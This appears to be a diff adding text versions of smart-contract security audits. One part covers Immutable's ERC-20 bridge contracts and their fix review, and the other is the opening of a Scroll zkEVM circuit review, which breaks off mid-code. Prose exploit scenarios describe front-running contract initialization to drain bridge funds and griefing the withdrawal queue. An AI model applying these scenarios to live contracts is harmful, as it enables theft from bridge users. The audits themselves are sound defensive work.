_setupRole(UNPAUSER_ADMIN_ROLE, unpauseAdmin); _setupRole(RATE_CONTROL_ROLE, rateAdmin); } Figure 1.2: Front-runnable initialize function ( RootERC20PredicateFlowRate.sol ) An attacker could front-run these functions and initialize the contracts with malicious values. The documentation provided by the Immutable team indicates that they are aware of this issue and how to mitigate it upon deployment of the proxy or when upgrading the implementation. However, there do not appear to be any deployment scripts to demonstrate that this will be correctly done in practice, and the codebase’s tests do not cover upgradeability. Exploit Scenario Bob deploys the RootERC20Predicate contract. Eve deploys an upgradeable version of the ExitHelper contract and front-runs the RootERC20Predicate initialization, passing her contract’s address as the exitHelper argument. Due to a lack of post-deployment checks, this issue goes unnoticed and the protocol functions as intended for some time, drawing in a large amount of deposits. Eve then upgrades the ExitHelper contract to allow her to arbitrarily call the onL2StateReceive function of the RootERC20Predicate contract, draining all assets from the bridge. Recommendations Short term, either use a factory pattern that will prevent front-running the initialization, or ensure that the deployment scripts have robust protections against front-running attacks. Long term, carefully review the Solidity documentation , especially the “Warnings” section, and the pitfalls of using the delegatecall proxy pattern. +2. Lack of lower and upper bounds for system parameters Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-IMM-2 Target: contracts/root/flowrate/RootERC20PredicateFlowRate.sol Description The lack of lower and upper bound checks when setting important system parameters could lead to a temporary denial of service, allow users to complete their withdrawals prematurely, or otherwise hinder the expected performance of the system. The setWithdrawalDelay function of the RootERC20PredicateFlowRate contract can be used by the rate control role to set the amount of time that a user needs to wait before they can withdraw their assets from the root chain of the bridge. // RootERC20PredicateFlowRate.sol function setWithdrawalDelay ( uint256 delay ) external onlyRole(RATE_CONTROL_ROLE) { _setWithdrawalDelay(delay); } // FlowRateWithdrawalQueue.sol function _setWithdrawalDelay ( uint256 delay ) internal { withdrawalDelay = delay; emit WithdrawalDelayUpdated(delay); } Figure 2.1: The setter functions for the withdrawalDelay state variable ( RootERC20PredicateFlowRate.sol and FlowRateWithdrawalQueue.sol ) The withdrawalDelay variable value is applied to all currently pending withdrawals in the system, as shown in the highlighted lines of figure 2.2. function _processWithdrawal ( address receiver , uint256 index ) internal returns ( address withdrawer , address token , uint256 amount ) { // ... // Note: Add the withdrawal delay here, and not when enqueuing to allow changes // to withdrawal delay to have effect on in progress withdrawals. uint256 withdrawalTime = withdrawal.timestamp + withdrawalDelay; // slither-disable-next-line timestamp if ( block.timestamp < withdrawalTime) { // solhint-disable-next-line not-rely-on-time revert WithdrawalRequestTooEarly( block.timestamp , withdrawalTime); } // ... } Figure 2.2: The function completes a withdrawal from the withdrawal queue if the withdrawalTime has passed. ( FlowRateWithdrawalQueue.sol ) However, the setWithdrawalDelay function does not contain any validation on the delay input parameter. If the input parameter is set to zero, users can skip the withdrawal queue and immediately withdraw their assets. Conversely, if this variable is set to a very high value, it could prevent users from withdrawing their assets for as long as this variable is not updated. The setRateControlThreshold allows the rate control role to set important token parameters that are used to limit the amount of tokens that can be withdrawn at once, or in a certain time period, in order to mitigate the risk of a large amount of tokens being bridged after an exploit. // RootERC20PredicateFlowRate.sol function setRateControlThreshold ( address token , uint256 capacity , uint256 refillRate , uint256 largeTransferThreshold ) external onlyRole(RATE_CONTROL_ROLE) { _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; } // FlowRateDetection.sol function _setFlowRateThreshold ( address token , uint256 capacity , uint256 refillRate ) internal { if (token == address ( 0 )) { revert InvalidToken(); } if (capacity == 0 ) { revert InvalidCapacity(); } if (refillRate == 0 ) { revert InvalidRefillRate(); } Bucket storage bucket = flowRateBuckets[token]; if (bucket.capacity == 0 ) { bucket.depth = capacity; } bucket.capacity = capacity; bucket.refillRate = refillRate; } Figure 2.3: The function sets the system parameters to limit withdrawals of a specific token. ( RootERC20PredicateFlowRate.sol and FlowRateDetection.sol ) However, because the _setFlowRateThreshold function of the FlowRateDetection contract is missing upper bounds on the input parameters, these values could be set to an incorrect or very high value. This could potentially allow users to withdraw large amounts of tokens at once, without triggering the withdrawal queue. Exploit Scenario Alice attempts to update the withdrawalDelay state variable from 24 to 48 hours. However, she mistakenly sets the variable to 0 . Eve uses this setting to skip the withdrawal queue and immediately withdraws her assets. Recommendations Short term, determine reasonable lower and upper bounds for the setWithdrawalDelay and setRateControlThreshold functions, and add the necessary validation to those functions. Long term, carefully document which system parameters are configurable and ensure they have adequate upper and lower bound checks. +3. RootERC20Predicate is incompatible with nonstandard ERC-20 tokens Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-IMM-3 Target: contracts/root/RootERC20Predicate.sol Description The deposit and depositTo functions of the RootERC20Predicate contract are incompatible with nonstandard ERC-20 tokens, such as tokens that take a fee on transfer. The RootERC20Predicate contract allows users to deposit arbitrary tokens into the root chain of the bridge and mint the corresponding token on the child chain of the bridge. Users can deposit their tokens by approving the bridge for the required amount and then calling the deposit or depositTo function of the contract. These functions will call the internal _depositERC20 function, which will perform a check to ensure the token balance of the contract is exactly equal to the balance of the contract before the deposit, plus the amount of tokens that are being deposited. function _depositERC20 (IERC20Metadata rootToken, address receiver , uint256 amount ) private { uint256 expectedBalance = rootToken.balanceOf( address ( this )) + amount; _deposit(rootToken, receiver, amount); // invariant check to ensure that the root token balance has increased by the amount deposited // slither-disable-next-line incorrect-equality require ((rootToken.balanceOf( address ( this )) == expectedBalance), "RootERC20Predicate: UNEXPECTED_BALANCE" ); } Figure 3.1: Internal function used to deposit ERC-20 tokens to the bridge ( RootERC20Predicate.sol ) However, some nonstandard ERC-20 tokens will take a percentage of the transferred amount as a fee. Due to this, the require statement highlighted in figure 3.1 will always fail, preventing users from depositing such tokens. Recommendations Short term, clearly document that nonstandard ERC-20 tokens are not supported by the protocol. If the team determines that they want to support nonstandard ERC-20 implementations, additional logic should be added into the _deposit function to determine the actual token amount received by the contract. In this case, reentrancy protection may be needed to mitigate the risks of ERC-777 and similar tokens that implement callbacks whenever tokens are sent or received. Long term, be aware of the idiosyncrasies of ERC-20 implementations. This standard has a history of misuses and issues. References ● ● Incident with non-standard ERC20 deflationary tokens d-xo/weird-erc20 +4. Lack of event generation Severity: Informational Difficulty: Low Type: Auditing and Logging Finding ID: TOB-IMM-4 Target: RootERC20PredicateFlowRate.sol , ImmutableSeaport.sol Description Multiple critical operations do not emit events. This creates uncertainty among users interacting with the system. The setRateControlThresholds function in the RootERC20PredicateFlowRate contract does not emit an event when it updates the largeTransferThresholds critical storage variable for a token (figure 4.1). However, having an event emitted to reflect such a change in the critical storage variable may allow other system and off-chain components to detect suspicious behavior in the system. Events generated during contract execution aid in monitoring, baselining behavior, and detecting suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions, and malfunctioning contracts and attacks could go undetected. function setRateControlThreshold ( 1 address token , 2 uint256 capacity , 3 uint256 refillRate , 4 5 uint256 largeTransferThreshold 6 ) external onlyRole(RATE_CONTROL_ROLE) { 7 8 9 } _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; Figure 4.1: The setRateControlThreshold function ( RootERC20PredicateFlowRate.sol #L214-L222 ) In addition to the above function, the following function should also emit events: ● The setAllowedZone function in seaport/contracts/ImmutableSeaport.sol Recommendations Short term, add events for all functions that change state to aid in better monitoring and alerting. Long term, ensure that all state-changing operations are always accompanied by events. In addition, use static analysis tools such as Slither to help prevent such issues in the future. +5. Withdrawal queue can be forcibly activated to hinder bridge operation Severity: Medium Difficulty: Low Type: Denial of Service Finding ID: TOB-IMM-5 Target: RootERC20PredicateFlowRate.sol Description The withdrawal queue can be forcibly activated to impede the proper operation of the bridge. The RootERC20PredicateFlowRate contract implements a withdrawal queue to more easily detect and stop large withdrawals from passing through the bridge (e.g., bridging illegitimate funds from an exploit). A transaction can enter the withdrawal queue in four ways: 1. If a token’s flow rate has not been configured by the rate control admin 2. If the withdrawal amount is larger than or equal to the large transfer threshold for that token 3. If, during a predefined period, the total withdrawals of that token are larger than the defined token capacity 4. If the rate controller manually activates the withdrawal queue by using the activateWithdrawalQueue function In cases 3 and 4 above, the withdrawal queue becomes active for all tokens, not just the individual transfers. Once the withdrawal queue is active, all withdrawals from the bridge must wait a specified time before the withdrawal can be finalized. As a result, a malicious actor could withdraw a large amount of tokens to forcibly activate the withdrawal queue and hinder the expected operation of the bridge. Exploit Scenario 1 Eve observes Alice initiating a transfer to bridge her tokens back to the mainnet. Eve also initiates a transfer, or a series of transfers to avoid exceeding the per-transaction limit, of sufficient tokens to exceed the expected flow rate. With Alice unaware she is being targeted for griefing, Eve can execute her withdrawal on the root chain first, cause Alice’s withdrawal to be pushed into the withdrawal queue, and activate the queue for every other bridge user. Exploit Scenario 2 Mallory has identified an exploit on the child chain or in the bridge itself, but because of the withdrawal queue, it is not feasible to exfiltrate the funds quickly enough without risking getting caught. Mallory identifies tokens with small flow rate limits relative to their price and repeatedly triggers the withdrawal queue for the bridge, degrading the user experience until Immutable disables the withdrawal queue. Mallory takes advantage of this window of time to carry out her exploit, bridge the funds, and move them into a mixer. Recommendations Short term, explore the feasibility of withdrawal queues on a per-token basis instead of having only a global queue. Be aware that if the flow rates are set low enough, an attacker could feasibly use them to grief all bridge users. Long term, develop processes for regularly reviewing the configuration of the various token buckets. Fluctuating token values may unexpectedly make this type of griefing more feasible. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Auditing The use of event auditing and logging to support monitoring Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades Documentation The presence of comprehensive and readable codebase documentation Front-Running Resistance Low-Level Manipulation The system’s resistance to front-running attacks The justified use of inline assembly and low-level calls Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of vulnerabilities in the future. Bridge Contracts ● ● ● ● The _setupRole function was deprecated in OpenZeppelin Contracts v4.4.0 in favor of the _grantRole function. Replace the deprecated calls with similar calls to _grantRole . Using 0x1 as the root chain token address for native ether could have subtle unexpected side effects because this address corresponds to the ecrecover precompile. Consider using a different address outside of the existing precompile space (e.g., some protocols use an address consisting of all 0xe s). Prefer using larger time units when possible to improve readability. For example, the DEFAULT_WITHDRAWAL_DELAY constant in the FlowRateWithdrawalQueue contract could be defined as 1 days instead of 60 * 60 * 24 . Assigning constant state variables to be the result of an expression that uses other constant variables can lead to an increase in gas costs, bytecode size, and unexpected results. This is because the compiler will replace all mentions of the constant with the expression itself, as opposed to replacing it with the result of the expression in case of literals. This can cause subtle issues if the expression results in a revert or panic (e.g., arithmetic underflow). D. Testing Improvement Recommendations This appendix aims to provide general recommendations on improving processes and creating a robust testing suite. General Recommendations Creating a robust testing suite is an iterative process that can involve defining or adjusting internal development processes and using multiple testing strategies and approaches. We compiled a list of general guidelines for improving testing suite quality below: 1. 2. 3. 4. 5. 6. Define a clear test directory structure. A clear directory structure can be beneficial for structuring the work of multiple developers, making it easier to identify which components and behaviors are being tested and giving insight into the overall test coverage. Write a design specification of the system, its components, and its functions in plain language. Defining a specification can allow the team to more easily detect bugs and inconsistencies in the system, reduce the likelihood that future code changes will introduce bugs, improve the maintainability of the system, and create a robust and holistic testing strategy. Use the function specifications to guide the creation of unit tests. Creating a specification of all preconditions, postconditions, failure cases, entry points, and execution paths for a function will make it easier to maintain high test coverage and identify edge cases. Use the interaction specifications to guide the creation of integration tests. An interaction specification will make it easier to identify the interactions that need to be tested and the external failure cases that need to be validated or guarded against. It will also help identify issues related to access controls and external calls. Use fork testing for integration testing with third-party smart contracts and to ensure the deployed system works as expected. Fork testing can be used to test interactions between the protocol contracts and third-party smart contracts by providing an environment that is as close to production as possible. Additionally, fork testing can be used to identify whether the deployed system is behaving as expected. Implement fuzz testing by first defining a set of system- and function-level invariants and then testing them with Echidna and/or Foundry. Fuzz testing is a powerful technique for exposing security vulnerabilities and finding edge cases that are unlikely to be found through unit testing or manual review. Fuzz testing can be done on a single function by passing in randomized arguments and on an entire system by generating a sequence of random calls to various functions inside the system. Both testing approaches should be applied. 7. Use mutation testing to identify gaps in test coverage and more easily identify bugs in the code. Mutation testing can help identify coverage gaps in unit tests and help discover security vulnerabilities. Taking a two-pronged approach using Necessist to mutate tests and universalmutator to mutate source code can prove valuable in creating a robust testing suite. Directory Structure Creating a specific directory structure for the system’s tests will make it easier to develop and maintain the testing suite and to find coverage gaps. This section contains brief guidelines on defining a directory structure: ● ● ● Create individual directories for each test type (e.g., unit/ , integration/ , fork/ , fuzz/ ) and for the utility contracts. The individual directories can be further divided into directories based on components or behaviors being tested. Create a single base contract that inherits from the shared utility contracts and is inherited by individual test contracts. This will help reduce code duplication across the testing suite. Create a clear naming convention for test files and test functions to make it easier to filter tests and understand the properties or contracts that are being tested. Specification Guidelines This section provides generally accepted best practices and guidance for how to write design specifications. A good design specification serves three purposes: 1. 2. It helps development teams detect bugs and inconsistencies in a proposed system architecture before any code is written. Codebases written without adequate specifications are often littered with snippets of code that have lost their relevance as the system’s design has evolved. Without a specification, it is exceedingly challenging to detect such code snippets and remove them without extensive validation testing. It reduces the likelihood that bugs will be introduced in implementations of the system . In systems without a specification, engineers must divide their attention between designing the system and implementing it in code. In projects requiring multiple engineers, engineers may make assumptions about how another engineer’s component works, creating an opportunity for bugs to be introduced. 3. It improves the maintainability of system implementations and reduces the likelihood that future code changes will introduce bugs. Without an adequate specification, new developers need to spend time “on-ramping,” where they explore the code and learn how it works. This process is highly error-prone and can lead to incorrect assumptions and the introduction of bugs. Low-level designs may also be used by test engineers to create property-based fuzz tests and by auditors to reduce the time needed to audit a specific protocol component. Specification Construction A good specification must describe system components in enough detail that an engineer unfamiliar with the project can use the specification to implement those components. The level of detail required to achieve this can vary from project to project, but generally, a low-level specification will include the following details, at a minimum: ● ● ● ● How each system component (e.g., a contract or plugin) interacts with and relies on other components The actors and agents that participate in the system, the way they interact with the system, and their permissions, roles, authorization mechanisms, and expected known-good flows The expected failure conditions the system may encounter and the way those failures are mitigated, including failures that are automatically mitigated Specification details for each function that the system will implement, which should include the following: ○ ○ ○ ○ ○ ○ ○ A description of the function’s purpose and intended use A description of the function’s inputs and the various validations that are performed against each input Any specific restrictions on the function’s inputs that are not validated or not obvious Any interactions between the function and other system components The function’s various failure modes, such as failure modes for queries to a Chainlink oracle for a price (e.g., stale price, oracle disabled) Any authentication or authorization required by the function Any function-level assumptions that depend on other components behaving in a specific way In addition, specifications should use standardized RFC-2119 language as much as possible. This language pushes specification authors toward a writing style that is both detailed and easy to understand. One relevant example is the ERC-4626 specification , which uses RFC-2119 language and provides enough constraints on implementers so that a vault client for a single implementation may be used interchangeably with other implementations. Interaction Specification Example An interaction specification is used to describe how the components of the system depend on each other. It includes a description of the other components that the system interacts with, the nature of those interactions, expected behavior or dependencies, and access relationships. A diagram can often be a helpful aid for modeling component interactions, but it should not be used to substitute a textual description of the component’s interactions. Part of the goal of a specification is to help derive a list of properties that can be explicitly tested, and deriving properties from a diagram is much more challenging and error-prone than deriving properties from a textual specification. Here is an example of an interaction specification. RootERC20Predicate interacts with the following contracts: ● StateSender : RootERC20Predicate calls the syncState function of this contract whenever: 1. a root token is mapped to a child token address, or 2. an ERC-20 or native asset is deposited into the contract. This function will emit an event that will be picked up by the off-chain components and later included as part of a commit to the receiving chain. The following contracts interact with RootERC20Predicate : ● [Example contract] The following actors interact with RootERC20Predicate : ● [Example actor] Function Specification Example Here is an example of a specification for the mapToken(IERC20Metadata rootToken) function. The mapToken function can be called by any account to map the root token address to a child token on the other chain. If the rootToken input parameter is zero, mapToken () must revert. If the rootToken address has already been mapped to a child token, mapToken () must revert. If the provided address is not the zero address and the address has not been mapped to a child token before, mapToken () must set the rootTokenToChildToken[rootToken] mapping to the address return value of the Clones.predictDeterministicAddress function, call the syncState function of the StateSender contract, emit the TokenMapped event, and return the child token address. Another complementary technique for defining a function specification, which can be especially useful for defining test cases, is the branching tree technique ( proposed by Paul Berg ), which is a tree-like structure based on all the execution paths, the contract state or function arguments that lead to each path, and the end result of each path. This type of specification can be useful when developing unit tests because it makes it easy to identify the execution paths, conditions, and edge cases that need to be tested. Constraints Specification Example Here is an example of a constraints specification. A RootERC20Predicate contract must be initialized in the same transaction as the deployment by calling the initialize function. RootERC20Predicate has two constraints that limit the contract’s operation: the stateSender address and the exitHelper address. The stateSender address must be defined during initialization and must implement the syncState function. If this address is not defined or is misconfigured, all calls to deposit or map tokens will fail, preventing the bridge from operating. The exitHelper address must be defined during initialization. If this address is not defined or is misconfigured, users will not be able to withdraw their bridged assets. Integration and Fork Testing Integration tests build on unit tests by testing how individual components integrate with each other or with third-party contracts. It can often be useful to run integration testing on a fork of the network to make the testing environment as close to production as possible and to minimize the use of mock contracts whose implementation can differ from the third-party contracts. We provide general recommendations on performing integration and fork testing below: ● Use the interaction specification to develop integration tests. Ensure that the integration tests aid in verifying the interaction’s specification. ● ● ● ● Identify valuable input data for the integration tests that can maximize code coverage and test potential edge cases. Use negative integration tests , similar to negative unit tests, to test common failure cases. Use fork testing to build on top of the integration testing suite. Fork testing will aid in testing third-party contract integrations and the proper configuration of the system once it is deployed. Enrich the forked integration testing suite with fuzzed values and call sequences (refer to the recommendations below). This will aid in increasing code coverage, validating system-level invariants, and identifying edge cases. Fuzz Testing ● ● ● ● ● Define system- and function-level invariants. Invariants are properties that should always hold within a system, component, or function. Defining invariants is a prerequisite for developing effective fuzz tests that can detect unexpected behavior. Developing a robust system specification will directly aid in the identification of system- and function-level invariants. Improving fuzz testing coverage. When using Echidna, regularly review the coverage files generated at the end of a run to determine whether the property tests’ assertions are reached and what parts of the codebase are explored by the fuzzer. To improve the fuzzer’s exploration and increase the chances that it finds an unexpected edge case, avoid overconstraining the function arguments. Integrate fuzz testing into the CI/CD workflow. Continuous fuzz testing can help quickly identify any code changes that will result in a violation of a system property and can force developers to update the fuzz testing suite in parallel with the code. Running fuzz campaigns stochastically may cause a divergence between the operations in the code and the fuzz tests. Add comprehensive logging mechanisms to all fuzz tests to aid in debugging. Logging during smart contract fuzzing is crucial for understanding the state of the system when a system property is broken. Without logging, it is difficult to identify the arithmetic or operation that caused the failure. Enrich each fuzz test with comments explaining the preconditions and postconditions of the test. Strong fuzz testing requires well-defined preconditions (for guiding the fuzzer) and postconditions (for properly testing the invariants in question). Comments explaining the bounds on certain values and the importance of the system properties being tested will aid in testing suite maintenance and debugging efforts. Mutation Testing At a high level, mutation tests make several changes to each line of a target file and rerun the testing suite for each change. Changes that result in test failures indicate adequate test coverage, while changes that do not result in test failures indicate gaps in the test coverage. Although mutation testing is a slow process, it allows auditors to focus their review on areas of the codebase that are most likely to contain latent bugs, and it allows developers to identify and add missing tests. We recommend using two mutation tools, both of which can help detect redundant code, insufficient test coverage, incorrectly defined tests or conditions, and bugs in the underlying source code under test: ● ● Necessist performs mutation of the testing suite by iteratively removing lines in the test cases. universalmutator performs mutation of the underlying source code. E. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On October 2, 2023, reviewed the fixes and mitigations implemented by the Immutable team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, the Immutable team has resolved all five issues described in this report. For additional information, please see the Detailed Fix Review Results below. ID Title Status 1 Initialization functions vulnerable to front-running Resolved 2 Lack of lower and upper bounds for system parameters Resolved 3 RootERC20Predicate is incompatible with nonstandard ERC- Detailed Fix Review Results TOB-IMM-1: Initialization functions vulnerable to front-running Resolved in commit 9156c04 through inline documentation. The Immutable team incorporated explanatory inline comments in both initialize functions. These comments highlight the potential for front-running and propose preventive steps, such as calling initialize when TransparentUpgradeableProxy is deployed through its constructor or calling initialize post-deployment of TransparentUpgradeableProxy to check for possible front-running. TOB-IMM-2: Lack of lower and upper bounds for system parameters Resolved in commit 29251f9 through inline documentation. The Immutable team added descriptive inline comments for both the setWithdrawalDelay and setRateControlThreshold functions, outlining the potential risks associated with setting excessively high and low threshold values and outlining the strategies to mitigate these risks, such as monitoring and resetting the threshold values. TOB-IMM-3: RootERC20Predicate is incompatible with nonstandard ERC-20 tokens Resolved in commit 9b5a008 through inline documentation. The Immutable team added inline comments indicating that the deposit function is not compatible with nonstandard ERC-20 tokens that implement fees during transfers. TOB-IMM-4: Lack of event generation Resolved in commit 64f1a11 and commit b46f2cc . Both the setRateControlThreshold and setAllowedZone functions now incorporate the events emitted after the execution of the corresponding action. TOB-IMM-5: Withdrawal queue can be forcibly activated to hinder bridge operation Resolved in commit 7ff87f2 through inline documentation. The Immutable team incorporated inline comments in the RootERC20PredicateFlowRate contract to highlight the dangers of misconfigured flow rates, which could potentially be exploited by an attacker, and to outline the measures to avoid such configuration errors. F. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. diff --git a/findings_newupdate/tob/2023-08-scroll-zkEVM-wave2-securityreview.txt b/findings_newupdate/tob/2023-08-scroll-zkEVM-wave2-securityreview.txt new file mode 100644 index 0000000..2f8b7f0 --- /dev/null +++ b/findings_newupdate/tob/2023-08-scroll-zkEVM-wave2-securityreview.txt @@ -0,0 +1,20 @@ +1. PoseidonLookup is not implemented Severity: Informational Difficulty: N/A Type: Testing Finding ID: TOB-SCROLL2-1 Target: src/gadgets/poseidon.rs Description Poseidon hashing is performed within the MPT circuit by performing lookups into a Poseidon table via the PoseidonLookup trait, shown in figure 1.1. /// Lookup represent the poseidon table in zkevm circuit pub trait PoseidonLookup { fn lookup_columns(&self) -> (FixedColumn, [AdviceColumn; 5]) { let (fixed, adv) = self.lookup_columns_generic(); (FixedColumn(fixed), adv.map(AdviceColumn)) } fn lookup_columns_generic(&self) -> (Column, [Column; 5]) { let (fixed, adv) = self.lookup_columns(); (fixed.0, adv.map(|col| col.0)) } } Figure 1.1: src/gadgets/poseidon.rs#11–21 This trait is not implemented by any types except the testing-only PoseidonTable shown in figure 1.2, which does not constrain its columns at all. #[cfg(test)] #[derive(Clone, Copy)] pub struct PoseidonTable { q_enable: FixedColumn, left: AdviceColumn, right: AdviceColumn, hash: AdviceColumn, control: AdviceColumn, head_mark: AdviceColumn, } #[cfg(test)] impl PoseidonTable { pub fn configure(cs: &mut ConstraintSystem) -> Self { let [hash, left, right, control, head_mark] = [0; 5].map(|_| AdviceColumn(cs.advice_column())); Self { left, right, hash, control, head_mark, q_enable: FixedColumn(cs.fixed_column()), } } Figure 1.2: src/gadgets/poseidon.rs#56–80 The rest of the codebase treats this trait as a black-box implementation, so this does not seem to cause correctness problems elsewhere. However, it does limit one’s ability to test some negative cases, and it makes the test coverage rely on the correctness of the PoseidonTable struct’s witness generation. Recommendations Short term, create a concrete implementation of the PoseidonLookup trait to enable full testing of the MPT circuit. Long term, ensure that all parts of the MPT circuit are tested with both positive and negative tests. +2. IsZeroGadget does not constrain the inverse witness when the value is zero Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-2 Target: src/gadgets/is_zero.rs Description The IsZeroGadget implementation allows for an arbitrary inverse_or_zero witness value when the value parameter is 0. The gadget returns 1 when value is 0; otherwise, it returns 0. The implementation relies on the existence of an inverse for when value is nonzero and on correctly constraining that value * (1 - value * inverse_or_zero) == 0. However, when value is 0, the constraint is immediately satisfied, regardless of the value of the inverse_or_zero witness. This allows an arbitrary value to be provided for that witness value. pub fn configure( cs: &mut ConstraintSystem, cb: &mut ConstraintBuilder, value: AdviceColumn, // TODO: make this a query once Query is clonable/copyable..... ) -> Self { let inverse_or_zero = AdviceColumn(cs.advice_column()); cb.assert_zero( "value is 0 or inverse_or_zero is inverse of value", value.current() * (Query::one() - value.current() * inverse_or_zero.current()), ); Self { value, inverse_or_zero, } } Figure 2.1: mpt-circuit/src/gadgets/is_zero.rs#48–62 Recommendations Short term, ensure that the circuit is deterministic by constraining inverse_or_zero to equal 0 when value is 0. Long term, document which circuits have nondeterministic witnesses; over time, constrain them so that all circuits have deterministic witnesses. +3. The MPT nonexistence proof gadget is missing constraints specified in the documentation Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-3 Target: src/gadgets/mpt_update/nonexistence_proof.rs Description The gadget for checking the consistency of nonexistence proofs is missing several constraints related to type 2 nonexistence proofs. The circuit specification includes constraints for the nonexistence of path proofs that are not included in the implementation. This causes the witness values to be unconstrained in some cases. For example, the following constraints are specified: ● other_key_hash should equal 0 when key does not equal other_key. ● other_leaf_data_hash should equal the hash of the empty node (pointer by other_key). Neither of these constraints is enforced in the implementation: this is because the implementation has no explicit constraints imposed for the type 2 nonexistence proofs. Figure 3.1 shows that the circuit constrains these values only for type 1 proofs. pub fn configure( cb: &mut ConstraintBuilder, value: SecondPhaseAdviceColumn, key: AdviceColumn, other_key: AdviceColumn, key_equals_other_key: IsZeroGadget, hash: AdviceColumn, hash_is_zero: IsZeroGadget, other_key_hash: AdviceColumn, other_leaf_data_hash: AdviceColumn, poseidon: &impl PoseidonLookup, ) { cb.assert_zero("value is 0 for empty node", value.current()); cb.assert_equal( "key_minus_other_key = key - other key", key_equals_other_key.value.current(), key.current() - other_key.current(), ); cb.assert_equal( "hash_is_zero input == hash", hash_is_zero.value.current(), hash.current(), ); let is_type_1 = !key_equals_other_key.current(); let is_type_2 = hash_is_zero.current(); cb.assert_equal( "Empty account is either type 1 xor type 2", Query::one(), Query::from(is_type_1.clone()) + Query::from(is_type_2), ); cb.condition(is_type_1, |cb| { cb.poseidon_lookup( "other_key_hash == h(1, other_key)", [Query::one(), other_key.current(), other_key_hash.current()], poseidon, ); cb.poseidon_lookup( "hash == h(key_hash, other_leaf_data_hash)", [ other_key_hash.current(), other_leaf_data_hash.current(), hash.current(), ], poseidon, ); }); Figure 3.1: mpt-circuit/src/gadgets/mpt_update/nonexistence_proof.rs#7–54 The Scroll team has stated that this is a specification error and that the missing constraints do not impact the soundness of the circuit. Recommendations Short term, update the specification to remove the description of these constraints; ensure that the documentation is kept updated. Long term, add positive and negative tests for both types of nonexistence proofs. +4. Discrepancies between the MPT circuit specification and implementation Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-SCROLL2-4 Target: Several files Description The MPT circuit implementation is not faithful to the circuit specification in many areas and does not contain comments for the constraints that are either missing from the implementation or that diverge from those in the specification. The allowed segment transitions depend on the proof type. For the NonceChanged proof type, the specification states that the Start segment type can transition to Start and that the AccountLeaf0 segment type also can transition to Start. However, neither of these paths is allowed in the implementation. MPTProofType::NonceChanged | MPTProofType::BalanceChanged | MPTProofType::CodeSizeExists | MPTProofType::CodeHashExists => [ SegmentType::Start, vec![ SegmentType::AccountTrie, // mpt has > 1 account SegmentType::AccountLeaf0, // mpt has <= 1 account ], ( ), ( SegmentType::AccountTrie, vec![ SegmentType::AccountTrie, SegmentType::AccountLeaf0, SegmentType::Start, // empty account proof ], ), (SegmentType::AccountLeaf0, vec![SegmentType::AccountLeaf1]), (SegmentType::AccountLeaf1, vec![SegmentType::AccountLeaf2]), (SegmentType::AccountLeaf2, vec![SegmentType::AccountLeaf3]), (SegmentType::AccountLeaf3, vec![SegmentType::Start]), Figure 4.1: mpt-circuit/src/gadgets/mpt_update/segment.rs#20– Figure 4.2: Part of the MPT specification (spec/mpt-proof.md#L318-L328) The transitions allowed for the PoseidonCodeHashExists proof type also do not match: the specification states that it has the same transitions as the NonceChanged proof type, but the implementation has different transitions. The key depth direction checks also do not match the specification. The specification states that the depth parameter should be used but the implementation uses depth - 1. cb.condition(is_trie.clone(), |cb| { cb.add_lookup( "direction is correct for key and depth", [key.current(), depth.current() - 1, direction.current()], key_bit.lookup(), ); cb.assert_equal( "depth increases by 1 in trie segments", depth.current(), depth.previous() + 1, ); cb.condition(path_type.current_matches(&[PathType::Common]), |cb| { cb.add_lookup( "direction is correct for other_key and depth", 